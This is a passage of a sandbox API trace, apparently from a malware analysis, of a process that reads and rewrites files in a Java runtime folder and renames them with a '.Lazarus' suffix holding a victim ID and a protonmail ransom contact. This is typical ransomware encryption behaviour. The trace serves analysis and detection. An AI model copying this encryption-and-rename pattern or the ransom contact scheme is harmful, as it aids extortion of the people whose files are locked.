lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0091.335] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.335] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.335] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.335] CloseHandle (hObject=0x360) returned 1 [0091.335] AreFileApisANSI () returned 1 [0091.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0091.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 53 [0091.336] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.336] GetFileType (hFile=0x360) returned 0x1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0091.336] CloseHandle (hObject=0x360) returned 1 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.337] AreFileApisANSI () returned 1 [0091.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0091.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 53 [0091.337] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7511d3f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7511d3f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2794a40)) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0091.337] AreFileApisANSI () returned 1 [0091.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0091.337] GetLastError () returned 0x0 [0091.337] SetLastError (dwErrCode=0x0) [0091.338] AreFileApisANSI () returned 1 [0091.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0091.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 53 [0091.338] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.338] GetFileType (hFile=0x360) returned 0x1 [0091.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0091.338] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0091.338] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0091.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0091.595] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0091.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0091.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0091.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0091.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0091.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0091.611] GetLastError () returned 0x0 [0091.611] SetLastError (dwErrCode=0x0) [0091.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0091.611] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0091.611] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0091.612] WriteFile (in: hFile=0x360, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0091.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0091.612] CloseHandle (hObject=0x360) returned 1 [0092.978] AreFileApisANSI () returned 1 [0092.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0092.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0092.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 53 [0092.979] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.979] GetFileType (hFile=0x360) returned 0x1 [0092.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0092.979] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0092.979] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0092.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0092.981] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0092.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e458 [0092.981] GetLastError () returned 0x0 [0092.981] SetLastError (dwErrCode=0x0) [0092.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0092.981] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0092.981] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0092.982] WriteFile (in: hFile=0x360, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0092.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0092.982] CloseHandle (hObject=0x360) returned 1 [0092.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0092.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71b68 [0092.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0092.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0092.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0092.982] AreFileApisANSI () returned 1 [0092.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0092.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0092.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 53 [0092.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8af48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0092.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0092.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8af48, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=115 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 115 [0092.982] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0092.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0092.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.983] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x3aadce6b, dwReserved1=0xb8b7abef, cFileName="jjs.exe", cAlternateFileName="")) returned 1 [0092.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0092.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0092.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0092.984] AreFileApisANSI () returned 1 [0092.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe", lpUsedDefaultChar=0x0) returned 47 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0092.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0092.984] AreFileApisANSI () returned 1 [0092.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0092.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0092.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 47 [0092.984] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.985] GetFileType (hFile=0x360) returned 0x1 [0092.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0092.985] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0092.986] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0092.986] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0092.986] CloseHandle (hObject=0x360) returned 1 [0092.986] AreFileApisANSI () returned 1 [0092.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0092.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71828 [0092.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 47 [0092.986] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.986] GetFileType (hFile=0x360) returned 0x1 [0092.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0092.986] CloseHandle (hObject=0x360) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.987] AreFileApisANSI () returned 1 